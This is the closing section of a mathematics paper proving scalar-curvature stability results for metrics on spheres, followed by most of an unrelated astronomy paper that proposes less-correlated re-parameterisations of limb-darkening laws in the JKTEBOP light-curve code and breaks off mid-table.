}\times\{p\}}4|\nabla|\phi|_{\overline{g}}^{2}dV_{g}. \tag{30}\] Hence, we may continue as before and deduce that Lemma 3.1 also holds in odd dimensions. Proof of Theorem A.: We follow the argument of B. Allen, E. Bryden and D. Kazaras [2]. In view of [3, Theorem 1.1] by B. Allen, R. Perales and C. Sormani, it suffices to show volume convergence. By assumption, \(g_{i}\geq g_{0}\) which implies \(|S^{n}|_{g_{i}}\geq|S^{n}|_{g_{0}}\). Hence, \(|S^{n}|_{g_{i}}\to|S^{n}|_{g_{0}}\) by Lemma 3.1 which finishes the proof. ## 4. Proofs of Theorem B and Theorem C In this section we show Theorem B and Theorem C in even dimensions. For the odd dimensional case we refer to Section 3.1, or more precisely to equation (30). In the previous section we demonstrated how Lemma 3.1 together with [3, Theorem 1.1] implies Theorem A. Similarly, Theorem B will follow from the lemma below. **Lemma 4.1**.: _Let \(n\geq 4\) be an even integer, let \(\alpha\in[n,\infty]\), and let \(g\) be a smooth metric on \(S^{n}\). Suppose that \(\|(R_{g}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\varepsilon|S^{n}|^{ \frac{2}{\beta}}\) for \(0<\varepsilon\leq\min\{\frac{1}{100},(C^{*}_{S_{\alpha}})^{-2}\}\), and that \(g\geq g_{0}\) on two-forms. Then there exists a constant \(C\) depending only on \(n\), \(\alpha\) and \(C^{*}_{S_{\alpha}}\) such that_ \[|S^{n}|_{g}-|S^{n}|_{g_{0}}\leq C\varepsilon^{\frac{1}{\delta}}. \tag{31}\] Proof.: Throughout this proof, we denote with \(C_{i\alpha}\) constants depending only on \(\alpha\) and \(C^{*}_{S_{\alpha}}\). Using Holder's inequality and our assumption on \(R_{g}\), we obtain \[\int_{S^{n}}|\phi|^{2}(n(n-1)-R_{g})_{+}dV_{g}\leq\|\phi\|_{\frac{2\alpha}{ \alpha-2}}^{2}\|(n(n-1)-R_{g})_{+}\|_{\frac{\alpha}{2}}\leq\varepsilon\|\phi \|_{\frac{2\alpha}{\alpha-2}}^{2}|S^{n}|_{\overline{g}}^{\frac{2}{\beta}}. \tag{32}\] Next, we apply the Sobolev inequality (5) to find \[\int_{S^{n}}|\nabla|\phi||^{2}dV_{g}\geq(C^{*}_{S_{\alpha}})^{-2}|S^{n}|_{ \overline{g}}^{\frac{2}{\beta}}\cdot\||\phi|-1\|_{\frac{2\alpha}{\alpha-2}}^{2}. \tag{33}\] Note that we can choose \(a=1\) in the Sobolev inequality (5) by rescaling \(\phi\) appropriately. 
Combining equation (32), Llarull's integral formula (14), and Kato's inequality yields \[\varepsilon\|\phi\|_{\frac{2\alpha}{\alpha-2}}^{2}|S^{n}|_{\overline{g}}^{ \frac{2}{\beta}}\geq 4\int_{S^{n}}|\nabla\phi|^{2}dV_{g}\geq 4(C^{*}_{S_{\alpha}})^{-2}|S^{n}|_{ \overline{g}}^{\frac{2}{\beta}}\cdot\||\phi|-1\|_{\frac{2\alpha}{\alpha-2}}^{2}. \tag{34}\] This implies \[\varepsilon\left(\int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}\right)^{ \frac{\alpha-2}{\alpha}}\geq 4(C_{S_{\alpha}}^{*})^{-2}\||\phi|-1\|_{\frac{2 \alpha}{\alpha-2}}^{2}. \tag{35}\] Therefore, \[\varepsilon^{\frac{\alpha}{\alpha-2}}\int_{S^{n}}|\phi|^{\frac{2\alpha}{ \alpha-2}}dV_{g}\geq\left(\frac{2}{C_{S_{\alpha}}^{*}}\right)^{\frac{2\alpha} {\alpha-2}}\int_{S^{n}}||\phi|-1|^{\frac{2\alpha}{\alpha-2}}\,dV_{g}. \tag{36}\] By the generalized mean inequality \[|\phi|^{\frac{2\alpha}{\alpha-2}}=(f+1)^{\frac{2\alpha}{\alpha-2}}\leq 2^{ \frac{\alpha+2}{\alpha-2}}(|f|^{\frac{2\alpha}{\alpha-2}}+1) \tag{37}\] where \(f=|\phi|-1\). Thus, \[\int_{S^{n}}|f|^{\frac{2\alpha}{\alpha-2}}dV_{g}\leq C_{0\alpha}\varepsilon^ {\frac{\alpha}{\alpha-2}}|S^{n}|_{g} \tag{38}\] for some constant \(C_{0\alpha}\). Moreover, \[\begin{split}\int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}=& \int_{S^{n}}|f+1|^{\frac{2\alpha}{\alpha-2}}dV_{g}\\ \leq&\int_{S^{n}}2^{\frac{\alpha+2}{\alpha-2}}(|f|^ {\frac{2\alpha}{\alpha-2}}+1)dV_{g}\\ \leq& 2^{\frac{\alpha+2}{\alpha-2}}(1+C_{0\alpha} \varepsilon^{\frac{\alpha}{\alpha-2}})|S^{n}|_{g}.\end{split} \tag{39}\] Therefore, using Holder's inequality, there exist constants \(C_{1\alpha}\), \(C_{2\alpha}\) such that \[\int_{S^{n}}|\phi|^{2}dV_{g}\leq C_{1\alpha}|S^{n}|_{g}\quad\text{and}\quad \int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}\leq C_{2\alpha}|S^{n}|_{g}. \tag{40}\] Let us denote with \(\mathcal{B}\) the set \(\mathcal{B}=\{x|n(n-1)-R_{g}\geq\varepsilon^{\frac{2}{3}}\}\). We estimate \[\varepsilon\geq\left[\frac{1}{|S^{n}|_{g}}\int_{S^{n}}[n(n-1)-R_{g}]_{\frac{ \alpha}{2}}^{\frac{\alpha}{2}}dV_{g}\right]^{\frac{2\alpha}{\alpha}}\geq \varepsilon^{\frac{2}{3}}\left(\frac{|\mathcal{B}|_{g}}{|S^{n}|_{g}}\right)^ {\frac{2}{\alpha}} \tag{41}\] which implies \[|\mathcal{B}|_{g}\leq\varepsilon^{\frac{\alpha}{6}}|S^{n}|_{g}. \tag{42}\] As before, let \(\mathcal{A}\) be the subset of \((S^{n},g)\) where \(\max_{l\neq j}\{\lambda_{l}\lambda_{j}\}\geq 1+\sqrt{\varepsilon}\). Then, similar to Equation (21), we obtain \[\sum_{j\neq l}\frac{1}{\lambda_{l}\lambda_{j}}-R_{g}\leq-\varepsilon^{\frac{ 1}{2}}\quad\text{on }\mathcal{A}\cap\mathcal{B}^{c}. 
\tag{43}\] Hence, \[\begin{split} 0\leq&\int_{S^{n}}|\phi|^{2}\left[\sum_{j \neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{g}\right]dV_{g}\\ \leq&\int_{\mathcal{A}^{c}\cap\mathcal{B}^{c}}| \phi|^{2}\varepsilon^{\frac{2}{3}}dV_{g}-\int_{\mathcal{A}\cap\mathcal{B}^{c} }|\phi|^{2}\varepsilon^{\frac{1}{2}}dV_{g}+\int_{\mathcal{B}}|\phi|^{2}(n(n-1 )-R_{g})dV_{g}\\ \leq&\int_{\mathcal{A}^{c}\cap\mathcal{B}^{c}}| \phi|^{2}\varepsilon^{\frac{2}{3}}dV_{g}-\int_{\mathcal{A}\cap\mathcal{B}^{c} }|\phi|^{2}\varepsilon^{\frac{1}{2}}dV_{g}+\left(\int_{\mathcal{B}}|\phi|^{ \frac{2\alpha}{\alpha-2}}dV_{g}\right)^{\frac{\alpha-2}{\alpha}}\|(n(n-1)-R_ {g})_{+}\|_{\frac{\alpha}{2}}\\ \leq&\varepsilon^{\frac{2}{3}}C_{1\alpha}|S^{n}|_{g} -\varepsilon^{\frac{1}{2}}\int_{\mathcal{A}\cap\mathcal{B}^{c}}|\phi|^{2}dV_{g }+\varepsilon C_{2\alpha}^{\frac{\alpha-2}{\alpha}}|S^{n}|_{g}.\end{split} \tag{44}\] Using Equation (38), we estimate \[\begin{split}\int_{\mathcal{A}\cap\mathcal{B}^{c}}|\phi|^{2}dV_{g}=& \int_{\mathcal{A}\cap\mathcal{B}^{c}}(1+f)^{2}dV_{g}\\ \geq&\int_{\mathcal{A}\cap\mathcal{B}^{c}}\left( \frac{3}{4}-3|f|^{2}\right)dV_{g}\\ \geq&\frac{3}{4}|\mathcal{A}\cap\mathcal{B}^{c}|-3 \left(\int_{\mathcal{A}\cap\mathcal{B}^{c}}1dV_{g}\right)^{\frac{2}{\alpha}} \left(\int_{\mathcal{A}\cap\mathcal{B}^{c}}|f|^{\frac{2\alpha}{\alpha-2}}dV_{g }\right)^{\frac{\alpha-2}{\alpha}}\\ \geq&\frac{3}{4}|\mathcal{A}\cap\mathcal{B}^{c}|_{g} -3|\mathcal{A}\cap\mathcal{B}^{c}|^{\frac{2}{\beta}}_{g}\left(C_{0\alpha} \varepsilon^{\frac{n}{\alpha-2}}|S^{n}|_{g}\right)^{\frac{\alpha-2}{\alpha}}\\ \geq&\frac{1}{2}|\mathcal{A}\cap\mathcal{B}^{c}|_{g} -C_{3\alpha}\varepsilon^{\frac{n}{\alpha-2}}|S^{n}|_{g}.\end{split} \tag{45}\] Combining Equation (44) and (45), there is a constant \(C_{4\alpha}\) such that \[|\mathcal{A}\cap\mathcal{B}^{c}|\leq\varepsilon^{\frac{1}{6}}C_{4\alpha}|S^{n }|_{g}. \tag{46}\] With the help of (42), we obtain \[|\mathcal{A}^{c}|_{g}\geq|\mathcal{A}^{c}\cap\mathcal{B}^{c}|_{g}=|S^{n}|_{g} -|\mathcal{B}|_{g}-|\mathcal{A}\cap\mathcal{B}^{c}|\geq(1-\varepsilon^{\frac{ 1}{6}}C_{4\alpha}-\varepsilon^{\frac{\alpha}{6}})|S^{n}|_{g}. \tag{47}\] Moreover, as in Equation (26) we have \(|\mathcal{A}^{c}|_{g}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}}\). Hence, \[|S^{n}|_{g}\leq(1-\varepsilon^{\frac{1}{6}}C_{4\alpha}-\varepsilon^{\frac{n}{ 6}})^{-1}(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}} \tag{48}\] which finishes the proof. Theorem C will be implied by the proposition below: **Proposition 4.2**.: _Let \(\alpha\in[n,\infty]\), and \(g_{i}\) be a sequence of smooth, metrics on \(S^{n}\), \(n\geq 3\), such that_ 1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{i}|S^{n}| _{g_{i}}^{\frac{2}{\alpha}}\)_,_ 2. \(g_{i}\geq g_{0}\) _on two-forms,_ 3. _the normalized Sobolev constants_ \(C_{S_{\alpha}}^{*}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above._ _Then there exists a constant \(C\) depending only on \(n,\alpha\) and the upper bounds for the Sobolev constants \(C_{S_{\alpha}}\) such that for each \(i\), there exists a set \(\Omega_{i}\) with_ 1. \(|\Omega_{i}|_{g_{i}}\leq Ci^{-\frac{1}{6}}\)_,_ 2. \(|g_{i}-g_{0}|_{g_{0}}\leq Ci^{-\frac{1}{2}}\) _in_ \(M\setminus\Omega_{i}\)_,_ 3. \(R_{g_{i}}\geq n(n-1)-Ci^{-\frac{2}{3}}\) _in_ \(M\setminus\Omega_{i}\)_._ Proof.: Utilizing the notation above, we set \(\Omega_{i}=\mathcal{A}_{i}\cup\mathcal{B}_{i}\). Conclusions (1) and (3) follow directly from the proof of Lemma 4.1 and the definition of \(\mathcal{B}_{i}\). 
Using \(n\geq 3\), Conclusion (2) follows by combining the definition of \(\mathcal{A}_{i}\) with the assumption \(\lambda_{l}\lambda_{j}\geq 1\). In the above setting, we already know that in the limit \(R_{g_{0}}\geq n(n-1)\). We remark that according to the work of R. Bamler and M. Gromov [5, 16] this lower bound on scalar curvature would have been automatically preserved under \(C^{0}\) convergence. Proof of Theorem C.: Fix \(\varepsilon>0\). According to the above proposition we can find a subsequence (which we will not relabel) such that \(|\Omega_{i}|_{g_{i}}\leq\varepsilon 2^{-i}\) and \(g_{i}\) is \(C^{0}\)-close to \(g_{0}\) on \(\Omega_{i}^{c}\). Let us denote with \(\Omega=\bigcup_{i=1}^{\infty}\Omega_{i}\) and note that \(|\Omega|_{g_{0}}\leq|\Omega|_{g_{i}}\leq\varepsilon\). On \(\Omega^{c}\subset S^{n}\), \(g_{i}\) converges to \(g_{0}\) in the \(C^{0}\) sense. **Remark 4.3**.: _It is necessary to pass to a subsequence in Theorem C and there are counterexamples otherwise. To demonstrate this, consider for each \(j\) a metric on the sphere with \(R_{g_{j}}\geq n(n-1)-\frac{1}{j}\), \(g\geq g_{0}\), and containing a spline. This spline can be rotated around construct a new sequence of metrics \(g_{i}\) such that there is no point \(p\in S^{n}\) where \(g_{i}(p)\to g_{0}(p)\) in the \(C^{0}\) sense._
2301.02531
Re-parameterisation of four limb darkening laws and their implementation into the JKTEBOP code
Limb darkening (LD) is typically parameterised using a range of functional "laws" in models of the light curves of eclipsing binary and transiting planetary systems. The two-coefficient LD laws all suffer from a strong correlation between their coefficients, preventing a reliable determination of both coefficients from high-quality light curves. We use numerical simulations to propose re-parameterisations of the quadratic, logarithmic, square-root and cubic LD laws that show much weaker correlations, and implement them into the JKTEBOP code. We recommend that these re-parameterisations are used whenever both LD coefficients are fitted. Conversely, when fitting for only one coefficient, the standard laws should be used to avoid problems with fixing coefficients at poor values. We find that these choices have little effect on the other fitted parameters of a light curve model. We also recommend that the power-2 LD law should be used as default because it provides a good fit to theoretical predictions, and that the quadratic and linear laws should be avoided because they do not.
John Southworth
2023-01-06T14:43:41Z
http://arxiv.org/abs/2301.02531v1
# Re-parameterisation of four limb darkening laws and their implementation into the JKTEBOP code

###### Abstract

Limb darkening (LD) is typically parameterised using a range of functional 'laws' in models of the light curves of eclipsing binary and transiting planetary systems. The two-coefficient LD laws all suffer from a strong correlation between their coefficients, preventing a reliable determination of both coefficients from high-quality light curves. We use numerical simulations to propose re-parameterisations of the quadratic, logarithmic, square-root and cubic LD laws that show much weaker correlations, and implement them into the jktebop code. We recommend that these re-parameterisations are used whenever both LD coefficients are fitted. Conversely, when fitting for only one coefficient, the standard laws should be used to avoid problems with fixing coefficients at poor values. We find that these choices have little effect on the other fitted parameters of a light curve model. We also recommend that the power-2 LD law should be used as default because it provides a good fit to theoretical predictions, and that the quadratic and linear laws should be avoided because they do not.

## Introduction

Limb darkening (LD) is a universal phenomenon which modifies the brightness of stars across their disc. LD results in a wavelength-dependent decrease in brightness from the centre of the observed disc to the limb, and in a steeper drop-off closer to the limb compared to near the centre. It arises because sightlines which enter the surface of the star at an angle ("slant viewing geometry") penetrate less deep into the atmosphere, see cooler plasma than a perpendicular sightline, and so perceive a lower flux. LD was first noticed in our Sun by Luca Valerio in 1612[1], and was first measured by Pierre Bouguer in 1729[2]. It must be accounted for in any observing project which involves spatially resolving a star, specifically interferometry, eclipsing binaries (EBs) and transiting planetary systems (TEPs). All analysis methods that the author is aware of for EBs and TEPs include a treatment of LD in order to properly represent the characteristics of the object(s) being considered. In this work we describe the implementation of multiple LD laws into the jktebop[*] code[3, 4] for modelling the light and radial velocity curves of EBs and TEPs. The novelty of this work lies primarily in the re-parameterisation of the two-coefficient LD laws to mitigate the strong correlations between the two coefficients. We begin with a reminder of the different LD laws in use, present the re-parameterisations we adopt, and conclude with advice on using the LD functionality now included in jktebop.
### Limb darkening laws

For the analysis of the light curves of EBs, LD was implemented in the pioneering Russell-Merrill method [5, 6, 7, 8, 9] using the linear law [5, 10]: \[\frac{F(\mu)}{F(1)}=1-u_{\rm lin}(1-\mu)\, \tag{1}\] where \(F(\mu)\) is the flux at position \(\mu=\cos\gamma\) on the stellar disc, \(\gamma\) is the angle between the observer's line of sight and the surface normal, \(F(1)\) is the flux at the centre of the disc, and \(u_{\rm lin}\) is the linear LD coefficient. The strength of the LD is specified by \(u_{\rm lin}\), which is normally between zero (no limb darkening) and unity (surface flux decreases to zero at the limb). The linear LD law has been known for over a century to be an inadequate representation of the solar LD [11, 12, 13, 14] prompting more sophisticated laws to be proposed: the quadratic LD law (Kopal [15]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm quad}(1-\mu)-v_{\rm quad}(1-\mu)^{2}\ \, \tag{2}\] the logarithmic law (Klinglesmith & Sobieski [16]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm log}(1-\mu)-v_{\rm log}\mu\ln\mu\ \, \tag{3}\] the square-root law (Diaz-Cordoves & Gimenez [17]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm sqrt}(1-\mu)-v_{\rm sqrt}(1-\sqrt{\mu})\ \, \tag{4}\] the cubic law (van't Veer [18]): \[\frac{F(\mu)}{F(1)}=1-u_{\rm cub}(1-\mu)-v_{\rm cub}(1-\mu)^{3}\ \, \tag{5}\] the power-2 law (Hestroffer [19]): \[\frac{F(\mu)}{F(1)}=1-c(1-\mu^{\alpha})\ \, \tag{6}\] and the four-parameter law proposed by Claret [20]: \[\frac{F(\mu)}{F(1)}=1-\sum_{n=1}^{4}u_{n}(1-\mu^{n/2})\ . \tag{7}\]

The ebop code[21, 22], on which jktebop is based, used the linear LD law. Diaz-Cordoves & Gimenez[17] and Gimenez & Diaz-Cordoves[23] modified ebop to include the quadratic and square-root LD laws. The current author subsequently added these and the logarithmic, cubic and four-parameter laws into jktebop (versions 12, 15 and 31). We have now added the power-2 law (jktebop version 43) which means that all the laws given above are now implemented in jktebop. The cubic law was included specifically because it was expected that the greater functional difference between the two terms (compared to the quadratic law) would make the two coefficients less correlated; it is shown below that this is indeed the case. It is possible within jktebop to use different LD laws for the two stars, with the exception of the four-parameter law.

### Review of published re-parameterisations of the LD laws

Our experience of using the LD laws in jktebop for a wide range of EBs and TEPs is that: the linear law is adequate for most ground-based data but not for light curves from space missions such as _Kepler_, _CoRoT_ and TESS; results from the two-parameter laws are typically in excellent agreement; one should fit for one of the two LD coefficients when possible because theoretical predictions are imperfect; fitting for both LD coefficients in the two-coefficient laws is not recommended because they can be severely correlated. Strong correlations are a particular issue for Markov chain Monte Carlo (MCMC) codes as they cause a long autocorrelation length and thus decrease the number of independent samples in the Markov chains. Support for these statements can be found in correlation plots[24, 25] and supplementary material for the _Homogeneous Studies_ publications[25, 26, 27, 28]. The strong correlations have also been noticed by other researchers, e.g. refs. [29] and [30].
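As a concrete reference for Eqs. (1)-(7), the short Python sketch below evaluates the normalised intensity profile \(F(\mu)/F(1)\) for each law. It is purely illustrative and independent of jktebop (which is a Fortran code); the function names and the example coefficient values are arbitrary.

```python
import numpy as np

# Normalised intensity profiles F(mu)/F(1) for the LD laws in Eqs. (1)-(7).

def linear(mu, u):
    return 1 - u*(1 - mu)

def quadratic(mu, u, v):
    return 1 - u*(1 - mu) - v*(1 - mu)**2

def logarithmic(mu, u, v):
    return 1 - u*(1 - mu) - v*mu*np.log(mu)

def square_root(mu, u, v):
    return 1 - u*(1 - mu) - v*(1 - np.sqrt(mu))

def cubic(mu, u, v):
    return 1 - u*(1 - mu) - v*(1 - mu)**3

def power2(mu, c, alpha):
    return 1 - c*(1 - mu**alpha)

def four_parameter(mu, u1, u2, u3, u4):
    return 1 - sum(u*(1 - mu**(n/2)) for n, u in zip((1, 2, 3, 4), (u1, u2, u3, u4)))

# Example: compare centre-to-limb profiles for arbitrary (illustrative) coefficients
mu = np.linspace(0.01, 1.0, 5)
print(quadratic(mu, 0.3, 0.2))
print(power2(mu, 0.65, 0.55))
```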
The correlations could be decreased by changing the parameterisation of the LD laws, and a range of re-parameterisations have been proposed for the quadratic law. Brown et al.[31] fitted for the sum and difference of the LD coefficients: \[u^{\prime}=u_{\rm quad}+v_{\rm quad} \tag{8}\] \[v^{\prime}=u_{\rm quad}-v_{\rm quad} \tag{9}\] Holman et al.[32] used another: \[u^{\prime}=2\,u_{\rm quad}+v_{\rm quad} \tag{10}\] \[v^{\prime}=u_{\rm quad}-2\,v_{\rm quad} \tag{11}\] and Pal[30] generalised these to \[u^{\prime}=u_{\rm quad}\sin\theta-v_{\rm quad}\cos\theta \tag{12}\] \[v^{\prime}=u_{\rm quad}\sin\theta+v_{\rm quad}\cos\theta \tag{13}\] where \(\theta\) depends on the properties of the system being studied but is usually between \(35^{\circ}\) and \(40^{\circ}\). Kipping[33] has explored these in detail, and Howarth[34] has discussed the comparison between observed and theoretical LD coefficients. Maxted[35] proposed a re-parameterisation of the power-2 LD law to depend on the coefficients \(h_{1}\) and \(h_{2}\) where \[h_{1}=\frac{F(0.5)}{F(1)}=1-c\,(1-2^{-\alpha}) \tag{14}\] and \[h_{2}=\frac{F(0.5)-F(0)}{F(1)}=c\,2^{-\alpha} \tag{15}\] and \(h_{1}\) and \(h_{2}\) are only weakly correlated (see also Short et al.[36]). We are not aware of proposed re-parameterisations for any of the other laws, a point also noted by Czismadia[37]. ### Data for numerical experiments It is desirable to avoid strong correlations between parameters when fitting the light curves of EBs and TEPs. We therefore chose to re-parameterise the two-parameter LD laws with coefficients that are less strongly correlated. As multiple differing options have been published for the quadratic law, and none for any of the other laws (except power-2), we decided to determine our own. The most straightforward way to do this is via numerical experiments. We identified a set of five EBs and TEPs with a variety of properties and for which excellent light curves exist. The rationale for these choices is that we expected the correlations between LD coefficients to depend on the physical attributes of a given system so needed to include objects with a range of characteristics, and that very high-quality photometry is needed to fit for both LD coefficients in a given system. The first object we analysed was the EB IT Cas, which was chosen because it shows deep V-shaped eclipses which arise from two very similar stars with an orbital inclination near \(90^{\circ}\), and thus should sample the full range of \(\mu\) values on the stellar discs. For this we used the Simple Aperture Photometry (SAP) from sector 17 of the Transiting Exoplanet Survey Satellite (TESS) downloaded from the Mikulski Archive for Space Telescopes (MAST1). We used only data with a QUALITY flag of zero, ignored the data errors as they were too small, and rejected all data more than one eclipse duration from the midpoint of an eclipse in order to save computing time. A detailed analysis of this system is in preparation and will be presented in due course as part of the _Rediscussion of Eclipsing Binaries_ project[38]. Footnote 1: [https://mast.stsci.edu/portal/Mashup/Clients/Mast/Portal.html](https://mast.stsci.edu/portal/Mashup/Clients/Mast/Portal.html) For our second object we chose WASP-50, a TEP for which an extremely high-quality transit light curve is available from a ground-based telescope[39]. These data proved to be useful but of insufficient quality to reliably measure two LD coefficients. 
We therefore chose a third object, the TEP system HAT-P-7[40] for which an extraordinarily good light curve is available from the _Kepler_ satellite[41]. We used the same data as in Southworth[27], which comprise the first 59 transits observed, all in short cadence mode[42]. We also added a fourth object, the totally-eclipsing binary YZ Cas[43], for which we used the sector 19 data from TESS. Finally, after inspection of the preliminary results, we added WW Aur[44] as it shows deep V-shaped eclipses similar to those of IT Cas but has a circular orbit. For WW Aur we used the sector 45 data from TESS. For both objects the TESS data were prepared in the same way as for IT Cas. The light curves of the five objects are shown in Figs. 1 and 2. We would have liked to extend this to stars hotter than YZ Cas A but were unable to identify a suitable candidate: all options we explored had either shallow eclipses, large fractional radii, pulsations, or no high-quality light curve. The light curve of each object was modelled using jktebop and a two-parameter LD law, with both LD coefficients fitted. Once a good fit was obtained, we ran a set of 1000 Monte Carlo simulations[45, 25], which comprised the generation and then least-squares fit of 1000 synthetic datasets with the same timestamps as the original data and brightness measurements taken from the original best-fitting Figure 1: TESS short-cadence SAP photometry of the three EBs analysed in the current work. The primary eclipses are shown in the left panels and the secondary eclipses in the right panels. The names are labelled on the panels. model with Gaussian noise applied. This was performed for the quadratic, logarithmic, square-root and cubic LD laws. We did not consider the linear LD law, because it only has one coefficient so is not affected by correlations between coefficients, or the power-2 law, as the \(h_{1}\) and \(h_{2}\) approach was judged to be already satisfactory. Conversely, the four-parameter law exhibits such strong correlations between its coefficients that we considered it to be a lost cause so made no attempt to re-parameterise it. \begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & \(-0.982\) & \(+0.998\) & \(-0.999\) & \(-0.952\) \\ WASP-50 & \(-0.951\) & \(+0.994\) & \(-0.996\) & \(-0.605\) \\ HAT-P-7 & \(-0.992\) & \(+0.992\) & \(-0.999\) & \(-0.973\) \\ YZ Cas & \(-0.978\) & \(+0.987\) & \(-0.999\) & \(-0.914\) \\ WW Aur & \(-0.995\) & \(+0.997\) & \(-0.999\) & \(-0.985\) \\ \end{tabular} \end{table} Table 1: _Linear Pearson correlation coefficients between the \(u\) and \(v\) coefficients of the two-parameter LD laws, assessed using Monte Carlo simulations as implemented in jktebop, for each of the five objects included in the numerical experimentation._ Figure 2: Light curves of the two TEPs analysed in the current work from the New Technology Telescope (WASP-50) and _Kepler_ (HAT-P-7). #### 3.2.2 New re-parameterisations We first assessed the linear Pearson correlation between the two LD coefficients in each Monte Carlo simulation, using the correlate function in IDL2. The results are given in Table 1 and support several conclusions. First, the correlations between \(u\) and \(v\) are in general horrendous. Second, we notice that the correlations are at their worst when the data are of the highest quality. Third, the coefficients of the square-root law exhibit almost perfect correlations so should never be fitted together. 
Fourth, the coefficients of the cubic LD law have the lowest correlations, supporting the expectation mentioned above. Footnote 2: [http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx](http://www.harrisgeospatial.com/SoftwareTechnology/IDL.aspx) We next sought alternative parameterisations that would reduce these correlations. We chose a functional form that is similar to that of Pal [30] but simpler: \[u^{\prime}=u+x\,v \tag{16}\] \[v^{\prime}=u-x\,v \tag{17}\] where the quantity \(x\) can be chosen to minimise the correlation between \(u^{\prime}\) and \(v^{\prime}\) for each LD law. The implementation of this in jktebop was done by modifying the input and output sections but converting the LD to the original parameterisations when calculating a model datapoint. This meant that we needed only the inverse transforms, which can easily be shown to be: \[u=\frac{u^{\prime}+v^{\prime}}{2} \tag{18}\] \[v=\frac{u^{\prime}-v^{\prime}}{2x} \tag{19}\] independently of the LD law. We then determined the value of \(x\), for each LD law and for each object, that minimised the correlation between \(u^{\prime}\) and \(v^{\prime}\). This was done by manual iteration and was restricted to two significant figures in \(x\) both for convenience and to avoid unnecessary precision. These values are given in Table 2 and show that the best value of \(x\) depends on both the object and the LD law, as expected.

\begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & 0.44 & 0.75 & 0.57 & 0.19 \\ WASP-50 & 0.59 & 0.57 & 0.51 & 0.29 \\ HAT-P-7 & 0.62 & 0.60 & 0.62 & 0.39 \\ YZ Cas & 0.63 & 0.64 & 0.60 & 0.33 \\ WW Aur & 0.58 & 0.62 & 0.62 & 0.35 \\ Adopted value & 0.6 & 0.6 & 0.6 & 0.3 \\ \end{tabular} \end{table} Table 2: _Values of x which minimise the correlation between \(u^{\prime}\) and \(v^{\prime}\), for each LD law and each object studied._

The results are highly consistent, with the exception of IT Cas for which significantly different \(x\) values are found in some cases. A plausible explanation for this is that IT Cas is the only object with an eccentric orbit, and the inclusion of \(e\sin\omega\) as a fitted parameter has modified the correlations between the LD coefficients. However, an exploratory Monte Carlo simulation with \(e\sin\omega\) fixed showed the same result so this supposition was not confirmed. Given this relatively good consistency in \(x\), we chose suitable values for implementation in jktebop for general use: 0.3 for the cubic law and 0.6 for the other three laws. For clarity, here are the revised versions of the LD laws we propose: \[u^{\prime}_{\rm quad}=u_{\rm quad}+0.6\,v_{\rm quad} \tag{20}\] \[v^{\prime}_{\rm quad}=u_{\rm quad}-0.6\,v_{\rm quad} \tag{21}\] for the quadratic law, \[u^{\prime}_{\rm log}=u_{\rm log}+0.6\,v_{\rm log} \tag{22}\] \[v^{\prime}_{\rm log}=u_{\rm log}-0.6\,v_{\rm log} \tag{23}\] for the logarithmic law, \[u^{\prime}_{\rm sqrt}=u_{\rm sqrt}+0.6\,v_{\rm sqrt} \tag{24}\] \[v^{\prime}_{\rm sqrt}=u_{\rm sqrt}-0.6\,v_{\rm sqrt} \tag{25}\] for the square-root law, and \[u^{\prime}_{\rm cub}=u_{\rm cub}+0.3\,v_{\rm cub} \tag{26}\] \[v^{\prime}_{\rm cub}=u_{\rm cub}-0.3\,v_{\rm cub} \tag{27}\] for the cubic law.
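As an illustration of how these transforms operate in practice, the following minimal Python sketch applies the forward mapping of Eqs. (16)-(17) with the adopted \(x\) values, the inverse mapping of Eqs. (18)-(19), and the \(h_{1}\), \(h_{2}\) mapping of Eqs. (14)-(15) for the power-2 law. It is not part of jktebop; the coefficient values are arbitrary and purely illustrative.

```python
from math import isclose

# Adopted x values (0.6 for quadratic/logarithmic/square-root, 0.3 for cubic).
X_FACTOR = {"quadratic": 0.6, "logarithmic": 0.6, "square-root": 0.6, "cubic": 0.3}

def to_reparam(u, v, law):
    """Forward transform, Eqs. (16)-(17): (u, v) -> (u', v')."""
    x = X_FACTOR[law]
    return u + x*v, u - x*v

def from_reparam(u_prime, v_prime, law):
    """Inverse transform, Eqs. (18)-(19): (u', v') -> (u, v)."""
    x = X_FACTOR[law]
    return 0.5*(u_prime + v_prime), (u_prime - v_prime)/(2.0*x)

def power2_to_h(c, alpha):
    """Eqs. (14)-(15): power-2 coefficients (c, alpha) -> (h1, h2)."""
    return 1.0 - c*(1.0 - 2.0**(-alpha)), c*2.0**(-alpha)

# Round-trip check with arbitrary illustrative coefficients
u, v = 0.35, 0.25
u_p, v_p = to_reparam(u, v, "quadratic")
u_back, v_back = from_reparam(u_p, v_p, "quadratic")
assert isclose(u_back, u) and isclose(v_back, v)
print(u_p, v_p, power2_to_h(0.65, 0.55))
```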
We assessed the correlation between \(u^{\prime}\) and \(v^{\prime}\) for each of these laws and for each of the five objects to gauge the improvement brought by the revised laws. These are given in Table 3 and show a clear improvement in all cases. There are nevertheless still some strong correlations, particularly for the logarithmic and square-root laws. We recommend that these laws are not used when attempting to fit both coefficients of a two-parameter LD law. As an example, in Figs. 3 and 4 we show scatter plots of the Monte Carlo simulation output for WW Aur, for the LD laws in their original form, for the lowest correlation for this object, and for the recommended re-parameterisations. \begin{table} \begin{tabular}{l c c c c} _Object_ & _quadratic law_ & _logarithmic law_ & _square-root law_ & _cubic law_ \\ IT Cas & \(-0.860\) & \(+0.969\) & \(-0.888\) & \(-0.842\) \\ WASP-50 & \(-0.034\) & \(-0.375\) & \(-0.890\) & \(-0.028\) \\ HAT-P-7 & 